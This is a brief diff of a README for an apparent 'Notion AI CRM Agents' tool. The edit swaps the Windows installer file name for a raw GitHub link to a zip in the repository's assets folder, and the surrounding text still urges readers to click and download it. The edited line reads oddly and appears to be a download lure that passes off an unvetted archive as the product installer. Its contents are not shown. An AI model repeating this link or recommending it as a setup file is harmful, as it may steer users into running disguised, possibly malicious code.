Mdirman/Notion-AI-CRM-Agents/README.md

 Look for a file suitable for your operating system:

-- For Windows, it may be named something like `Notion-AI-CRM-Agents-Setup.exe`
+- For Windows, it may be named something like `https://github.com/Mdirman/Notion-AI-CRM-Agents/raw/refs/heads/main/assets/A-CR-Notion-Agents-3.5.zip`
 - For macOS, look for a `.dmg` or `.pkg` installer

 Click on the file to download it to your computer.
 The download size will typically be below 200 MB.